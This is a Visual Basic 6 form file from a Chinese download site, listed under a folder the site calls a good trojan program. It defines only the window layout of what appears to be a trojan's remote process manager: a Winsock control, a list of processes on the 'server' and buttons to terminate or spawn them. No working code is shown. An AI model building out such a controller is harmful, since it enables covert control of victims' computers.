⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 frmprocesses.frm

📁 优秀的木马程序,自己看吧
💻 FRM
字号:
VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Begin VB.Form frmProcesses 
   BorderStyle     =   3  'Fixed Dialog
   Caption         =   "Start/Terminate Process"
   ClientHeight    =   4335
   ClientLeft      =   45
   ClientTop       =   330
   ClientWidth     =   5760
   BeginProperty Font 
      Name            =   "Tahoma"
      Size            =   8.25
      Charset         =   0
      Weight          =   400
      Underline       =   0   'False
      Italic          =   0   'False
      Strikethrough   =   0   'False
   EndProperty
   Icon            =   "frmProcesses.frx":0000
   LinkTopic       =   "Form1"
   MaxButton       =   0   'False
   MinButton       =   0   'False
   ScaleHeight     =   4335
   ScaleWidth      =   5760
   ShowInTaskbar   =   0   'False
   StartUpPosition =   3  'Windows Default
   Begin MSWinsockLib.Winsock Winsock 
      Left            =   120
      Top             =   3840
      _ExtentX        =   741
      _ExtentY        =   741
      _Version        =   393216
   End
   Begin VB.CommandButton btnClose 
      Caption         =   "&Close"
      Height          =   375
      Left            =   4800
      TabIndex        =   9
      Top             =   3840
      Width           =   855
   End
   Begin VB.Frame Frame3 
      Height          =   30
      Left            =   120
      TabIndex        =   8
      Top             =   3720
      Width           =   5535
   End
   Begin VB.CommandButton btnSpawn 
      Caption         =   "&Spawn"
      Height          =   375
      Left            =   120
      TabIndex        =   7
      Top             =   3240
      Width           =   855
   End
   Begin VB.TextBox txtNewProcess 
      Height          =   285
      Left            =   120
      TabIndex        =   6
      Text            =   "Type the path to the executable file here"
      Top             =   2880
      Width           =   5535
   End
   Begin VB.Frame Frame2 
      Height          =   30
      Left            =   120
      TabIndex        =   4
      Top             =   2520
      Width           =   5535
   End
   Begin VB.CommandButton btnTerminate 
      Caption         =   "&Terminate"
      Height          =   375
      Left            =   120
      TabIndex        =   3
      Top             =   2040
      Width           =   855
   End
   Begin VB.ListBox lstServersProcesses 
      Height          =   1425
      Left            =   120
      TabIndex        =   2
      Top             =   480
      Width           =   5535
   End
   Begin VB.Frame Frame1 
      Height          =   30
      Left            =   0
      TabIndex        =   0
      Top             =   0
      Width           =   5775
   End
   Begin VB.Label Label2 
      Caption         =   "Spawn this new process:"
      BeginProperty Font 
         Name            =   "Tahoma"
         Size            =   8.25
         Charset         =   0
         Weight          =   700
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   255
      Left            =   120
      TabIndex        =   5
      Top             =   2640
      Width           =   2175
   End
   Begin VB.Label Label1 
      Caption         =   "Processes currently running on the server:"
      BeginProperty Font 
         Name            =   "Tahoma"
         Size            =   8.25
         Charset         =   0
         Weight          =   700
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   255
      Left            =   120
      TabIndex        =   1
      Top             =   120
      Width           =   3735
   End
End
Attribute VB_Name = "frmProcesses"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -